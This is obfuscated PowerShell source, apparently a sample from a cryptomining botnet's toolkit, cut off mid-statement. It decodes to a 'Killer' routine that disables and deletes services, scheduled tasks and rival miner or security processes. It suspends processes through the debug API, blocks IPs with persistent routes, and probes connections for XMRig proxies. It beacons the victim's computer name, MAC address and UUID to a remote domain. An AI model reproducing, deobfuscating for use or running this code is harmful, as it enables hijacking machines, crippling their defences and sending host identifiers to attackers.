JRtSrPIy+PIyvPIy+PIyName = uWy'+'xWinWpdSrvuWy, uWySVSHoPIy+PIys'+'tuWy, uWyMicrosoft TelemetryuWy, uWylsa'+'ssuWy, uWPIy'+'+PIyyMicrosof'+'PIy+PIytuWPIy'+'+PIyy, uWysystemuWy,'+' uWyOracleupdateuWy, uWyCLRuPIy+PIyWy, 
uWysysmgtuWy, uWyTaDgmuWy,PIy+PIy uWyWmdnPnSNuWy, uWySougoudluWy,uWPIy+PIyyNationaluWy, uW'+'yN'+'a'+'tionaaaluWy, uPIy+PIyWPIy+PIyyNatimmonaluWy, uWyNationalolluWy, uWyNationalmllPIy+PIyuWy,uWyNationalaieuWy,uWyNationalwpiuWy,uWyWiPIy+PIynHelp32uWPIy+'+'PIyy,uWyWinHelp64uWy, PIy+PIyuWySamPIy+'+'PIyserveruWy, uWyRpcEptMange'+'ruWy,'+' uWPIy+PIyyNPIy+PIyetMsmqActiv Media NVIDIAuWy, uW'+'ySncryption MPIy+PIyedia PlayeqPIy+PIyuWy,uWySxSuWy,uWyW'+'inSvcuWy,uWymssecsvc2.1uWy,uWymssecsvc2.0uWy,uWyWindows_Up'+'dateuWy,uWyWindows ManagersuWy,uWySvcNlauseruWy,uWy'+'WinVaultSvcuWy,uWyXtfyPIy+PIyuWy,uWyXtfyauWy,uWyXtfyxxxuWy,uWy360rTysuWy,uWyIPSECSuWy,uWyMpeSvcuWy,uWySRDSLuWy,uWyWifiServiceuWy,uWyALGMuW'+'y,uWywmiApSrvsuWy,uWywmiApServsuWy,uWP'+'Iy+PIyytaskmgr1uWy,PIy+PIyuWyWebPIy+PIyServersuWy,uWyExpressVNServiceuWy,uWyWWW.DDOS.CN.PIy+PIy'+'COMuWy,PIy+PIyuWyWinHelpSvcsuWy,uWyaspnet_statersuWy,uWyclr_optimizationuPIy+PIyWy,uWyAxInstSVuW'+'y,uWPIy+PIyyZationaluWy,uWyDNS ServeruWy,uWySPIy+PIyerPIy+PIyhiezu'+'Wy,uWySuperProServeruWy,uWy.Net CLRuWPIy+PIyy,uWyWissss'+'ssnHelp32uWy,uWyWinH'+'asdadelp32uWy,uWyWinHasdelp32uWy,uW'+'yClipBoPIy+PIyoksuPIy+PIyWy write-host uWPIy+PI'+'yykiPIy+PIyll services...uWy PIy+PIy foreach(JR'+'tSrv in JRtSrvName) {P'+'Iy+PIy JRtNull = SC.exe PIy+PIyConfig JRtSrv StarPIy+'+'PIyt= Disabled JRtNull = SC.exe Stop JRtSrv '+'JRtNull = SC.exe DPIy+PIyelete JRtSrv } JRtTaskName = u'+'WymPIy+PIyy1uWy,uWyMysauWy, uWyMysa1u'+'Wy, uWyMysa2uWy, uWyMysa3uWy, PIy+PIyuWyokuWy, uWyO'+'racle JavauWy, uWyOr'+'acle Java UPIy+PIypdateuWy, uWyMic'+'rosoft Telemetr'+'yuWy, uWySpooler SubSystP'+'Iy'+'+PIyem ServiceuWy,uWyOracle PrPIy+PIyodu'+'cts'+' Re'+'porteruWy, uWyUpdatePI'+'y+PIy service for productsuWy, uWyg'+'muWyPIy+PIy, 
uWyngmuWy,uWySorryuWy,uWyWindows_UpdateuWy,uWyUpdate_windows'+'uWy,PIy+PIyuWyWindo'+'wsUpdate1uWy,uWPIy+PIyyWindo'+'wsUpdatPIy+PIye2uWy,uWyWindowsUpdate3uW'+'y,uWyAdobeF'+'lashPlayeruWy,PIy+PIyuWyFlashPlayer1uWy,uWyF'+'PIy'+'+PIylashPlayer2uWy,uWyFlashPlayer3uWy,'+'uWy'+'IISu'+'Wy,uWyWindowsLogTa'+'sksuWy,uWySystem'+' Log SPIy+PIyecurity CheckuWy,uWyUpdateu'+'Wy,uWyUpdate1uWy,uWyUpdate2uWy,uWyUpPIy+PIydate3uWy,uWyUpdate4uWy,uWyDNSu'+'PIy+PIyWy,uWySYSTEMuWy,uWyDNS2uWy,uWySYSTEMauWy,uWPIy+PIyyskycmduWy,uWyMiscfostuWy,uWyNetframeworkuWy,uWPIy+PIyyFlashuWy,PIy+PIyuWyRavTaskuWy,uWyGooPIy+PIyglePingPIy+PIyConfig'+'suWy,'+'uWyHomeGroupProvideruWy,uWyMiscfostNsiuPIy+PIyWy,uWyWwANsvcuWy,uWyBluetoothsuWy,uWyDdri'+'vePIy+P'+'IyrsuWyPIy+PIy,uWyDnsScanuWy,uWyWebServersuWy,uWyCredentialsuWy,uWyTablteInputoutuWy,uWywerclpsyportuWy,uWyHispDemornuWy,uWyLimeRAT-Ad'+'minuWy,uWyDnsCoreuWyPIy+PIy,uWPIy+PIyyUpdate serPIy+PIyvice for Windows ServiceuWy,uWyDnsCoreuWy,uWyECD'+'nsCoreuWy writPIy+PIye-host uWykill tasks...uWy'+' fPIy+P'+'Iyoreach (JRtTask inPIy+PIy JRtTaskNam'+'ePIy+PIy) { SchTa'+'sks.e'+'xe /DelePIy+PIyte /TN JRtTask /F 2> JPI'+'y+PIyRtNull } JRtPIy+PIyMiner = uWySCuWy,uWyWerMgruWy,uWyWerFaultuWy,uWyDW20uWPIy+PIyy,uWymsinfouWy, uWyXMPIy+PIyR*uWy,uWyxmrig*uWy, '+'uWyminerdu'+'Wy, '+'uWyMinerGateuWy, uWyCarbo'+'nuWy, uPIy+PIyWyyamm1uWy, uWyupgeadeu'+'PIy+PIyWy, uWyauto-PIy+PIyupgeadeuWy, PIy+PIy'+'uWysvsPIy+PIyhostuWy, uWySystPIy+PIyemIISuWy, uWySystemIISSePIy+PIycuWy, i'+'DfWindowsUpdater*iDf, uWyWindowsDefender*uWy, uWyupdateuWy, uWycarssuWy,PIy+PIy uWyserviceuWy, uWycsrscuWy, uWycarauWy, uWyjavaupduWy, uWygxdrvuWy, uWylsmoseeuWy, uW'+'ysecuamsuWy, uWySQPIy+PIyLEXPRESS_X64_86uWy, uWyPIy+PIyCalli'+'grapuWy, PIy+PIyuWySqlceqpuWy, uWySettinPIy+PIyguW'+'y, uWy'+'UninstauWy, 
uWyconhosteuWy,PIy+PIyuWySetringuWy,uWyGalliPIy+PIygrpuWy,uWyImaginguWy,u'+'WytaskegruWy'+',uWyTerms.EXEuWy,uPIy+PIyWy360uWy,uWy88PIy+PIy66uWy,uWy99PIy+PIy66uWy,uWy9696uWy,uWy9797uWy,uWysvchostiuWy,uWySearchIPIy+PIyndexuWy,uWyAvirauWy,uWycohernece'+'uWy,uWywinuWy,uWySQLforwinuWy,uWyPIy+PIyxig*u'+'Wy,uWytaskmgr1uWy'+',uWyWorkstationuWy,uWyressuWy,PIy+PIyuWyex'+'ploresuWy '+' write-host uWyPIy+PIykill processes...uWy foreach (JRPIy+PIytm PIy+PIyin JRtMiner) { Get-PrPIy+PIyocess -P'+'Iy+PI'+'y'+'Name JRtm -ErrorAction SilentlyContinue eS1 Stop-Process -Force PIy+PIy} JRttm = Get-Process -Name TaskMgr -ErrorAcPIy+PIytioPIy+'+'PIyn SilentlyContinue if('+'JRttm -eq JRtnull){ Start-Process -WindowSPIy+PIytyle hi'+'dden -FP'+'Iy+PIyilePath TaPIy+PI'+'yskmgr.exe PIy+PIy } JRttcpconn '+'= NetStaPIy+PIyt -anop TCP JRtipcache=@(iDf170.187.1'+'49.77:80iPIy+PIyDf,iPIy+PIyDf138PIy+P'+'Iy.68.186.90:80iDf,iDf176.5'+'8.99.231:80iDf,iPIy+PIyDfPIy+PIy138.68.2'+'51.24:80iDf,iDf165.227.62.120:443iDf,iDf202'+'.182.120.192:443iDf,iDf178.62.2.194:443i'+'Df,iDf138.68.4.1'+'9:443iDf,iDf176.58.99.231:443iDf,iDfPIy+PIy138.68.PIy+PIy251.24:443iDf,'+'iDf85.117.234.189:443iDf,iDf159.203'+'.122.42iDf) P'+'Iy+PIy forPIy+PIyeach(JRttempip in JRtipcache'+'){ unbanIp JRttempPIy+PIyip } '+'PIy+PIy JRtppids = getprotected write-host uWykill connections...uWy foreach (JRtt in JRttcpconn) { JRtl'+'in'+'e = JRtt.split(iDf iDf)eS1 ? 
{JRtPIy+PIy_} if (JRtline -eq JRtnul'+'l) { contiPIy+PIynue '+'} if (JRtt'+'.contains(uWyLISTENINGuWy) PIy+P'+'Iy-and (JRtline[1].coPIy+PIyntains(uWy4PIy+PIy'+'3669uWyPIy+PIy) -or JRtline[1].contains(uWy43'+'668uWy))'+') { JRtppids += JRtline[-1] PIy+PIy PIy+PIycontinue '+' } PIy+PIy if(JRtt.contains(uWyESTAP'+'Iy+PI'+'yBLISHEDuWy)PIy+PIy -and (JRtline[2].gettype() '+'PIy'+'+PIy-eq uWyuWy.gettype()) -and (JRtlinePI'+'y+PIy[2].indexOf(uWy'+':uWy) -ne -1)){ PIy+PIy JRtip,JRtport = JRtline[2].spPIy+PIylit(iDf:iDfPIy+PI'+'y) '+'JRtcurrpid = JRtline[-'+'1] iPIy+PIyf((JRtipcache -contaPIy+PIyins PIy+PIyJRtline[2]) -or (JRtppids -cPIy+PIyontains JRtcurrpid) -or (JRtip.length -lt 4) -orPIy+PIy -not(isPPIy+PIyubIP'+' JRtip) -orP'+'Iy+PIy (JRtpPIy+PIyort -le 0)){ PIy+PIy continue '+' } if(JRtglobal:ipdealca'+'chePIy+PIy -contains JRtline[2]){ '+' ProcessSusP'+'Iy+PIypend JRt'+'currpid '+'PIy+PIy banIp JRtip PIy+PIy continue PIy+PIy } writPIy+PIyePIy+PIy-host uWytryPIy+PIy JRtipPIy+PIy JRtport'+'...uWy if(((ishttp JRtip JRtpor'+'t) -eq JRtf'+'alse) -and ((ishttps JRtip JRtport) -eq JRtfalse)'+'){PIy+PIy write-host PIy+PIyuWyend http tPIy+PIyest...uWy JRtiPIy+PIysmproxy = 0 '+' if((iPIy+PIysminerproxy JRtipPI'+'y+PIy JRtport) -eq JRttrue){ PIy+PI'+'y '+' '+' JPIy+PIyRtismproxy = 1 PIy+PIy} else{ '+' '+' if((ism'+'inerproxys JRtip JRtport) -eq PIy+PIyJRttrue){ JRtismproxy = 2'+' '+' }PIy+PIy '+'PIy+PIy } if(JRtismproxy -ne 0){ '+' ProcessSuspend JRtcurrpid '+' '+' banPIy+PIyIp JRtip PIy+PIy JRtglobal:ipdealcache += JRtline[2] '+' sendmsg JRtline[2] JRtismproxy JRtcurrpid '+' } '+'} if(JRtipcache -notcontains JRtline[P'+'Iy+PIy2]){JRtiPIy+PIypcache += JRtline[2]} '+' } } JRtglobal:rePIy+PIytry+'+'+ } JRtst'+'art_time=Get-Date -UFormat uWy%suWy '+'JRtglobal:ipdealcache=@() JRtglobal:retry=0 JRtser=[System.Net.SocPIy+PIykePIy+PIyts.TcpListener]65529 JRtser.start()PIy+PIy while(PIy+PIyJRtt'+'rue){ if('+'((Get-Date -UFormat uWy%suWy)-JRtstart_time) -gt 60000) {break} uWytry to 
kill...uWy KPIy+PIyiller '+' uWyki'+'ll PIy+'+'PIydone...uWy Start-Sleep -SPIy+PIyeconds 600 } PIy).rePlAcE(([chAR]74+[chAR]82+[chAR]116),[STrinG][chAR]36).rePlAcE(([chA'+'R]10'+'5+[chAR]68+[chAR]102),[STrinG][chAR]39).rePlAcE(PIy'+'TaDPIy,[STrinG][chAR]92).rePlAcE(PIyeS1PIy,PIy6PJPIy).rePlAcE(PIyuWyPIy,[STrinG][chAR]34).rePlAcE(PIy9mRPIy,PIy7FjPIy)) ').rEplAcE(([chaR]80+[chaR]73+[chaR]121),[stRINg][chaR]39).rEplAcE(([chaR]76+[chaR]68+[chaR]78),'$').rEplAcE('6PJ',[stRINg][chaR]124).rEplAcE(([chaR]55+[chaR]70+[chaR]106),'') #| iNVoKE-eXPrESSioN -------------------------------------------------------------------------------- /DriveLife/krBin/kr-1.2.ps1: -------------------------------------------------------------------------------- 1 | #.( $sheLLiD[1]+$ShElliD[13]+'x') ( ('if(!JRtdown_url){ JRtdown_url = i'+'D'+'fhttp://d.u78wjd'+'u.comiDf } try{JRtver'+'sion=JRtifmd5[0..5]-joinuWyuWy}catch{} function isPubIP { Param( [par'+'ame'+'ter(Mandatory=JRttrue)][String]JRtip ) '+'JRtresIps = @( '+' @(40265'+'31840L, 3758096384L)'+', @(4026531840L, 4026531840L), @(4278190080L, 0L), @(4278190080L, 167772160L), '+' @(4278190080L, 2130706432L), '+' @(429'+'0772992L, 1681915904L), @(4293918720L, 2886729728L), @(4294836224L, 3323068416L),'+' @(4294901760L, 285199'+'5648L), @(4294901760L, 32322'+'3'+'5520L), @(4294967040L, 3221225472L), @(4294967040L, 3221225984L), @'+'(4294967'+'040L, 3227017984L), @(4294967040L, 3325256704L), @(4294967040L, 3405803776L), @(4294967295L, 429496'+'7295L) )'+' JRti'+'p'+'arr = JRtip.split(uW'+'y.uWy) JRtiplong = '+'0 '+' for(JRti=3;JRti -g'+'e 0; JRt'+'i--){ JRtiplong = JRtiplong -bor [int]JRtiparr[3-JRti] * [math'+']::pow(2,8*JRti) } for(JRtj=0;JRtj -lt JRtresIps.count;JRtj++){ if((JRtiplong -band JRtresIps[JRtj][0])'+' -eq JRtresIps[JRtj][1]){ return JRtfalse '+' } } return JR'+'ttrue } fun'+'ction ssl_connect(JRtip,'+'JRtport,JRtsend_str){ JRtret = '+'uWyuWy'+' try{ '+' JRtsocket = N'+'ew-Object Ne'+'t.'+'Sockets.TcpClient(JRtip, JRtp'+'ort) '+' 
JRtsslStream = New-Object System.Net.Security.SslStream(JRtsocke'+'t.GetStream(),JRtfalse,('+'{JRtTrue} -as [Net.Security.RemoteC'+'ertificateValidationCallback])) '+' JRtsslStream.ReadTimeout = 5000 '+' JRtsslStream.Authe'+'nticateAsClient(iDfiDf) JRtw'+'riter = new-object'+' System.IO.Stre'+'amWriter('+'JRts'+'slStream) JRtrea'+'der = new-object S'+'ystem.IO.StreamReader('+'JRtsslStream) JRtwriter.WriteLine(JRtsend_str) '+' '+' JRtwriter.flush() JRtret = JRtreader.ReadLine() JRtsocket'+'.close() }catch{} return JRtret } function raw_c'+'onnect(JRtip,JRtport,JRtsend_str){ try{ '+' J'+'Rtclient = NEW-objEcT Net.Sockets.TcpClient(JRtip,JRtport) JRtsock = JRtclient.Client JRtbytes = [Text.Encodin'+'g]::ASCII.Ge'+'tBytes(JRtsend_str) '+' JRtsock.sen'+'d((JRtbytes)'+') eS1 out-null JRtsock.ReceiveTimeout = 50'+'00 '+' '+' JRtres = [Array]::CreateInstance(('+'iD'+'fbyteiDf), 10000) JRtrecv = JRtsock.Receive(JRtres) JRtres = JRtres[0..(JRtrecv-1)] JRtst'+'r = [Text.Encoding]::'+'ASCII.g'+'etstring(J'+'Rtres) return '+'JRtstr }catch{} return uWy'+'uWy } function ishttp(JRtip,JRtport){ '+' JRtdata=uWyGET / HTTP/1'+'.19mRn9mRnuWy'+' JRtret = raw_connect JRtip JRtport'+' JRtdata if(JRtret.inde'+'xOf(uWyHTTP/1uWy) -ne -1){ '+' return JRt'+'true } return JRtfalse } func'+'tion ishttps(JRtip,JRtport){ JRtdata = uWyGET / HTTP/1.19mR'+'n9mRnuWy JRtret'+' = ssl_connect JRtip JRtport JRtdata '+' if(JRtret.indexOf(uWyHTTP/1uWy'+') -ne -1){ return JRttrue '+'} return JRtfal'+'se } function isminerproxy(JRtip,JRtport){ JRtdata =iDf{uWyiduWy:1,uWyjsonrpcuWy:uWy2.0uWy,uWymethoduWy:uWyloginuWy,uWyparamsuWy:{uWyloginu'+'Wy:uWyxuWy,uWypassuWy:null,uWya'+'gentuWy:uWyXMRig/5.13.1uWy,uWyalg'+'ouWy:[uWycn/1uWy'+',uWycn/2uWy,uWycn/ruWy,uWycn/fastuWy,'+'uWycn/halfuWy,uWycn/xaouWy,uWycn/rtouWy,uWycn/rwzuWy,uWycn/zlsuWy,uWycn/doubleuWy,u'+'Wyrx/0uWy,uWyrx/wowuWy,uWyrx/lokiuWy,uWyrx/arquWy,uWyrx/sfxuWy,uWyrx/kevauWy]}}iDf '+'+ uWy9mRnuW'+'y JRtret = r'+'aw_connect JRtip '+'JRtport JR'+'tdata'+' 
if(JRtret.indexOf(uWyjsonrpcu'+'Wy) -ne -'+'1){ '+' write-host uWyminer proxy!!uWy return '+'JRtt'+'rue } retu'+'rn JRtfalse } function isminerp'+'roxys(JRtip,JRtport){ JRtdata = iDf'+'{uWyiduWy:1,uWyjsonrpcuWy'+':uWy2.0uWy,uWymethoduWy:uWyloginuWy,uWyparamsuWy:{'+'uWylogin'+'uWy:uWyxuWy,uWypassuWy:'+'null,uWyagentuWy'+':uWyXMRig/5.13'+'.1uWy,uWyalgouWy:[uWycn/1uWy,'+'uWycn/2uWy,uWycn/ruWy,uWycn/fastuWy,uWyc'+'n/halfuWy,uWycn/xaouWy,uWycn/rtouWy,uWycn/rwz'+'uWy'+',uWycn/zlsuWy,uWycn/doubleuWy,uWyrx/0uWy,uWyrx/'+'wowuWy,uWyrx/lokiuWy,uWyrx/arquWy,uWyrx/sf'+'xuWy,uWyrx/kevauWy]}}iDf JRtret = ssl_connect JRtip JRtp'+'ort J'+'Rtdata if(JRtret.indexOf(uWyjsonrpcuWy) -ne -1){ writ'+'e-host uWymin'+'er proxys!!uWy '+' re'+'turn JRtt'+'rue } return JRtfalse } Ad'+'d-Type -TypeDefinition iDfusing System;using System.Diagnostics;using System'+'.Security.Principal;using System.Runtime.InteropServices;pu'+'blic static class Kernel32{[DllImport(uWykernel32.dlluWy)] public static extern bool'+' CheckRemoteDebuggerPresent(IntPtr hProce'+'ss,'+'out bool pbDebuggerPresent);[DllImport(uWykernel32.dl'+'luWy)] public static extern int DebugAct'+'iveProcess(int PID);[DllImport(uWykerne'+'l32.dlluWy)] public static exter'+'n int DebugActiveProcessStop(int PID);}iDf function ProcessSuspend(JRtid){ J'+'RtprocName = (Get-Process -id JRtid -Er'+'rorAction SilentlyContinue).name if(JRtprocName -eq JRtnull){ Write-Hos'+'t u'+'WyERROR: There i'+'s no process with an ID of JRtiduWy return } '+' Write-host u'+'WyAttempting to suspend JRtprocName (PID: JRtid)...uWy if (JRtid -le 0) { write-host uWyYou didniDft '+'input a positive integeruWy return } JRtd'+'ebug = whoami /priv eS1 Where-Object{JRt_ -like uWy*SeDebugPrivilege*uWy}'+' if(JRtdebug -ne JRtnull){ '+' JRtDebugPresent = [IntPtr'+']::Zero JRtout'+' = [Kernel'+'32]::CheckRe'+'moteDebuggerPresent(((Get-Process -Id'+' JRti'+'d).Handle),[ref]JRtdebugPresent) if (JRtdebugPresent){ wr'+'ite-host uWyThere is already a debugger attached to this 
processuWy '+' retur'+'n } '+' '+' JRtsuspend = [Kernel32]::Debug'+'Ac'+'tiveProcess(JRtid) if'+' (JRtsuspend -eq JRtfalse){ write-host uWyERROR: Unable to'+' suspend JRtprocName (PID: JRtid)uWy } else{ write-host u'+'WyThe JRtprocName process (PID: JRtid) was successfully'+' suspended!uWy } } else{ write-host uWyERROR: You do not have debu'+'gging pri'+'vileges to pau'+'se a'+'ny p'+'rocessuWy'+' return } } function gmd5(JRtd){ [Secu'+'ri'+'ty.Cryptograph'+'y.MD5]::Create().Compute'+'Hash('+'JRtd)eS1foreach{JRtl+'+'=JRt_.ToString(iDfx2'+'iDf)} return JRtl } function getprotected(){ function getrname(){ function gmd5(JRtd){ [Security.Cryptography.MD5]::Create().C'+'omput'+'eHash(JRtd)eS1fore'+'ach{JRtl+=JRt_.ToString(iDfx2iDf)} return JRtl } JRtrpath=uWyC:TaDWindowsTaDSy'+'stem32TaDWindowspowershellTaDV1.0uWy '+' JRtenames = gci uWyJR'+'trpathTaD*uWy -Include *.exe'+' -Exclude po'+'wershell.exeeS1f'+'oreach{JRt_.name}'+' JRtt'+'md5 = gmd5 ([IO.File]::R'+'eadAllBytes(uWyJRtrpathTaDpowershell.exeuWy)) foreach(JRtename in JRtenames){ '+' JRtmd5_=gmd'+'5 ([IO.File]::Read'+'AllBytes(uWyJRtrpathTaDJRtenameu'+'W'+'y)) if(JRttmd5 -eq '+'JRtmd5_){ '+' '+' return JRtename '+' } '+' } retur'+'n uWyNULLNULLuWy } JRtcomp_name = JRtenv:COMPUTERNAME JRtguid = (get-wmiobject W'+'in32_ComputerSystemProduct).UUID JRtmac = (Get-WmiObject Win32_NetworkAdapter'+'Configuration eS1 where {'+'JRt_.ipenabled -EQ JRttrue}).Macaddress eS1 select-object '+'-first 1 JRtm6exe=('+'gmd5 ([system.Text.E'+'ncoding]::UTF8.GetBytes(JRtcomp_name+J'+'Rtguid+JRtm'+'ac))).substring(0,6) JRtpi'+'ds=@'+'() JRtpids+=Get-WmiObject -Class Win32_ProcesseS1Where-Object{JRt_.path -li'+'ke iD'+'f*m6g.bin.exe*iDf -or JRt_.path -like iDf*m6.bin.ex'+'e*iDf -'+'or'+' JRt_.path -like uWy*JRtm'+'6exe*uWy -or JRt_.name -eq (getrname)}eS1foreach{JRt_.processid} return JRtpids } function sen'+'dmsg(JRtip,JRtismproxy,JRtmpid){ try{ JRtm'+'ac = (Ge'+'t-WmiObject Win32_Network'+'AdapterConfiguration eS1 where {JRt_.ipenabled 
-EQ JRttru'+'e}).Macaddress eS1 select-objec'+'t'+' -first 1 '+' JRtguid = (get-wmiobjec'+'t Win32_Comp'+'uterSystemProduct).UUID JRtcomp_na'+'me = JRtenv:COMPUTERNAME if(JRtip -eq iD'+'fiDf){ '+' JRturl = uWyJR'+'tdown_url/kl_repo.json?JRtversion&JRtglobal:retry&JRtcomp_name&JRtmac&JRtguiduWy } else { JRt'+'pname = Get-Process -id J'+'Rtmpid eS1 Select-Objec'+'t -ExpandProperty Name '+' JRturl = uWyJRtdown_url/'+'rellik.json?JRtvers'+'ion&JRtglobal:retry&J'+'Rtco'+'mp_nam'+'e&JRtmac&JRtguid&JRtip&JRtismproxy&JRtmpid&'+'JRtpnameuWy '+' } (New'+'-Object Net.WebClient).DownloadString('+'J'+'Rturl) }catch{}'+' } function'+' banIp(JRtip)'+'{ '+' route add J'+'Rtip 0.0.0.0 IF 1'+' -p } function unbanIp(JRtip){ route del'+'ete JRtip 0.0.0.0 } Function Killer { JRtSr'+'v'+'Name = uWyxWinWpdSrvuWy, uWySVSHo'+'stuWy, uWyMicrosoft TelemetryuWy, uWylsassuWy, uW'+'yMicrosof'+'tuW'+'y, uWysystemuWy, uWyOracleupdateuWy, uWyCLRu'+'Wy, uWysysmgtuWy, uWyTaDgmuWy,'+' uWyWmdnPnSNuWy, uWySougoudluWy,uW'+'yNationaluWy, uWyNationaaaluWy, u'+'W'+'yNatimmonaluWy, uWyNationalolluWy, uWyNationalmll'+'uWy,uWyNationalaieuWy,uWyNationalwpiuWy,uWyWi'+'nHelp32uW'+'y,uWyWinHelp64uWy, '+'uWySam'+'serveruWy, uWyRpcEptMangeruWy, uW'+'yN'+'etMsmqActiv Media NVIDIAuWy, uWySncryption M'+'edia Playeq'+'uWy,uWySxSuWy,uWyWinSvcuWy,uWymssecsvc2.1uWy,uWymssecsvc2.0uWy,uWyWindows_UpdateuWy,uWyWindows ManagersuWy,uWySvcNlauseruWy,uWyWinVaultSvcuWy,uWyXtfy'+'uWy,uWyXtfyauWy,uWyXtfyxxxuWy,uWy360rTysuWy,uWyIPSECSuWy,uWyMpeSvcuWy,uWySRDSLuWy,uWyWifiServiceuWy,uWyALGMuWy,uWywmiApSrvsuWy,uWywmiApServsuWy,uW'+'ytaskmgr1uWy,'+'uWyWeb'+'ServersuWy,uWyExpressVNServiceuWy,uWyWWW.DDOS.CN.'+'COMuWy,'+'uWyWinHelpSvcsuWy,uWyaspnet_statersuWy,uWyclr_optimizationu'+'Wy,uWyAxInstSVuWy,uW'+'yZationaluWy,uWyDNS ServeruWy,uWyS'+'er'+'hiezuWy,uWySuperProServeruWy,uWy.Net CLRuW'+'y,uWyWissssssnHelp32uWy,uWyWinHasdadelp32uWy,uWyWinHasdelp32uWy,uWyClipBo'+'oksu'+'Wy write-host uW'+'yki'+'ll services...uWy '+' foreach(JRtSrv in 
JRtSrvName) {'+' JRtNull = SC.exe '+'Config JRtSrv Star'+'t= Disabled JRtNull = SC.exe Stop JRtSrv JRtNull = SC.exe D'+'elete JRtSrv } JRtTaskName = uWym'+'y1uWy,uWyMysauWy, uWyMysa1uWy, uWyMysa2uWy, uWyMysa3uWy, '+'uWyokuWy, uWyOracle JavauWy, uWyOracle Java U'+'pdateuWy, uWyMicrosoft TelemetryuWy, uWySpooler SubSyst'+'em ServiceuWy,uWyOracle Pr'+'oducts ReporteruWy, uWyUpdate'+' service for productsuWy, uWygmuWy'+', uWyngmuWy,uWySorryuWy,uWyWindows_UpdateuWy,uWyUpdate_windowsuWy,'+'uWyWindowsUpdate1uWy,uW'+'yWindowsUpdat'+'e2uWy,uWyWindowsUpdate3uWy,uWyAdobeFlashPlayeruWy,'+'uWyFlashPlayer1uWy,uWyF'+'lashPlayer2uWy,uWyFlashPlayer3uWy,uWyIISuWy,uWyWindowsLogTasksuWy,uWySystem Log S'+'ecurity CheckuWy,uWyUpdateuWy,uWyUpdate1uWy,uWyUpdate2uWy,uWyUp'+'date3uWy,uWyUpdate4uWy,uWyDNSu'+'Wy,uWySYSTEMuWy,uWyDNS2uWy,uWySYSTEMauWy,uW'+'yskycmduWy,uWyMiscfostuWy,uWyNetframeworkuWy,uW'+'yFlashuWy,'+'uWyRavTaskuWy,uWyGoo'+'glePing'+'ConfigsuWy,uWyHomeGroupProvideruWy,uWyMiscfostNsiu'+'Wy,uWyWwANsvcuWy,uWyBluetoothsuWy,uWyDdrive'+'rsuWy'+',uWyDnsScanuWy,uWyWebServersuWy,uWyCredentialsuWy,uWyTablteInputoutuWy,uWywerclpsyportuWy,uWyHispDemornuWy,uWyLimeRAT-AdminuWy,uWyDnsCoreuWy'+',uW'+'yUpdate ser'+'vice for Windows ServiceuWy,uWyDnsCoreuWy,uWyECDnsCoreuWy writ'+'e-host uWykill tasks...uWy f'+'oreach (JRtTask in'+' JRtTaskName'+') { SchTasks.exe /Dele'+'te /TN JRtTask /F 2> J'+'RtNull } JRt'+'Miner = uWySCuWy,uWyWerMgruWy,uWyWerFaultuWy,uWyDW20uW'+'y,uWymsinfouWy, uWyXM'+'R*uWy,uWyxmrig*uWy, uWyminerduWy, uWyMinerGateuWy, uWyCarbonuWy, u'+'Wyyamm1uWy, uWyupgeadeu'+'Wy, uWyauto-'+'upgeadeuWy, '+'uWysvs'+'hostuWy, uWySyst'+'emIISuWy, uWySystemIISSe'+'cuWy, iDfWindowsUpdater*iDf, uWyWindowsDefender*uWy, uWyupdateuWy, uWycarssuWy,'+' uWyserviceuWy, uWycsrscuWy, uWycarauWy, uWyjavaupduWy, uWygxdrvuWy, uWylsmoseeuWy, uWysecuamsuWy, uWySQ'+'LEXPRESS_X64_86uWy, uWy'+'CalligrapuWy, '+'uWySqlceqpuWy, uWySettin'+'guWy, uWyUninstauWy, 
uWyconhosteuWy,'+'uWySetringuWy,uWyGalli'+'grpuWy,uWyImaginguWy,uWytaskegruWy,uWyTerms.EXEuWy,u'+'Wy360uWy,uWy88'+'66uWy,uWy99'+'66uWy,uWy9696uWy,uWy9797uWy,uWysvchostiuWy,uWySearchI'+'ndexuWy,uWyAvirauWy,uWycoherneceuWy,uWywinuWy,uWySQLforwinuWy,uWy'+'xig*uWy,uWytaskmgr1uWy,uWyWorkstationuWy,uWyressuWy,'+'uWyexploresuWy write-host uWy'+'kill processes...uWy foreach (JR'+'tm '+'in JRtMiner) { Get-Pr'+'ocess -'+'Name JRtm -ErrorAction SilentlyContinue eS1 Stop-Process -Force '+'} JRttm = Get-Process -Name TaskMgr -ErrorAc'+'tio'+'n SilentlyContinue if(JRttm -eq JRtnull){ Start-Process -WindowS'+'tyle hidden -F'+'ilePath Ta'+'skmgr.exe '+' } JRttcpconn = NetSta'+'t -anop TCP JRtipcache=@(iDf170.187.149.77:80i'+'Df,i'+'Df138'+'.68.186.90:80iDf,iDf176.58.99.231:80iDf,i'+'Df'+'138.68.251.24:80iDf,iDf165.227.62.120:443iDf,iDf202.182.120.192:443iDf,iDf178.62.2.194:443iDf,iDf138.68.4.19:443iDf,iDf176.58.99.231:443iDf,iDf'+'138.68.'+'251.24:443iDf,iDf85.117.234.189:443iDf,iDf159.203.122.42iDf) '+' for'+'each(JRttempip in JRtipcache){ unbanIp JRttemp'+'ip } '+' JRtppids = getprotected write-host uWykill connections...uWy foreach (JRtt in JRttcpconn) { JRtline = JRtt.split(iDf iDf)eS1 ? 
{JRt'+'_} if (JRtline -eq JRtnull) { conti'+'nue } if (JRtt.contains(uWyLISTENINGuWy) '+'-and (JRtline[1].co'+'ntains(uWy4'+'3669uWy'+') -or JRtline[1].contains(uWy43668uWy))) { JRtppids += JRtline[-1] '+' '+'continue } '+' if(JRtt.contains(uWyESTA'+'BLISHEDuWy)'+' -and (JRtline[2].gettype() '+'-eq uWyuWy.gettype()) -and (JRtline'+'[2].indexOf(uWy:uWy) -ne -1)){ '+' JRtip,JRtport = JRtline[2].sp'+'lit(iDf:iDf'+') JRtcurrpid = JRtline[-1] i'+'f((JRtipcache -conta'+'ins '+'JRtline[2]) -or (JRtppids -c'+'ontains JRtcurrpid) -or (JRtip.length -lt 4) -or'+' -not(isP'+'ubIP JRtip) -or'+' (JRtp'+'ort -le 0)){ '+' continue } if(JRtglobal:ipdealcache'+' -contains JRtline[2]){ ProcessSus'+'pend JRtcurrpid '+' banIp JRtip '+' continue '+' } writ'+'e'+'-host uWytry'+' JRtip'+' JRtport...uWy if(((ishttp JRtip JRtport) -eq JRtfalse) -and ((ishttps JRtip JRtport) -eq JRtfalse)){'+' write-host '+'uWyend http t'+'est...uWy JRti'+'smproxy = 0 if((i'+'sminerproxy JRtip'+' JRtport) -eq JRttrue){ '+' J'+'Rtismproxy = 1 '+'} else{ if((isminerproxys JRtip JRtport) -eq '+'JRttrue){ JRtismproxy = 2 }'+' '+' } if(JRtismproxy 